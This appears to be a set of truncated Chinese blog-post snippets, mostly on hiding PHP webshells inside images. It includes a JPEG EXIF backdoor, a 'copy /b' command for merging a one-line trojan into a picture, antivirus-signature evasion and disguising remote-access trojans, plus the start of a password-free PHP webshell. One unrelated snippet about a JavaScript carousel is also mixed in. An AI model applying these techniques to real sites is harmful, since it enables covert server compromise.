这是一个非常有趣的后门，它并没有依靠正常模式去隐藏起内容(比如 base64/gzip 编码)，但是它却把自己的数据隐藏在JPEG图片的EXIF头部中了。它也使用exif_read_data和preg_replace两个PHP函数来读取EXIF头部和执行。 细节 这个后门可分为两部分 ...

一、来源 1、图片马的生成： 使用CMD制作一句话木马。参数/b指定以二进制格式复制、合并文件; 用于图像类/声音类文件参数/a指定以ASCII格式复制、合并文件。用于txt等文档类文件copy 1.jpg/b+1.php 2.jpg //意思是将1.jpg以二进制与1.php合并 ...

一、写在最前面 最近都忙一些杂七杂八的事情，复习软考、研读经典...好像都好久没写过博客了。。。 我自己写过三个图片轮播，一个是简单的原生JS实现的，没有什么动画效果的，一个是结合JQuery实现的，淡入淡出切换的。现在想做一个酷一点的放在博客或者个人网站，到时候可以展示自己的作品。逛了一下慕 ...

木马免杀原理 一、实验目的 1.了解杀毒软件特征码查杀病毒的基本原理 2.掌握木马特征码免杀的原理和方法 二、实验环境 1.系统环境：Windows环境， XP环境 2.软件工具：灰鸽子，MYCCL，OC_cntrump，AVG杀毒软件，ollydbg 三、实验原理 杀毒软件特征码 ...

引言 本文将介绍有关如何将远控木马伪装成图片的操作 利用工具：BD2 Net Injector 提示：这工具在我的 win10 计算机中无法打开，但是在 win7 成功运行。 工具各功能介绍 实例： 最后点击下方的√，就会生成一个这样的： 当然了，这个就比较粗糙一些了，建议好好 ...

<?php ;//无需验证密码！ $shellname='hello~地球~猴子星球欢迎你 '; define('myaddress',__FILE__); error_reporting(E_ERROR | E_PARSE); header("content-Type ...

0x01什么是图片木马？ 图片木马在网络上没有统一的定义，在这里我给出自己的定义。图片木马是一张能正常显示又包含恶意代码（比如一句话木马）的图片文件。 根据定义我们知道图片木马两个条件： 图片能正常显示 包含能执行的而已代码 总体思路：将恶意代码写在图片文件中非图片数据区 ...

...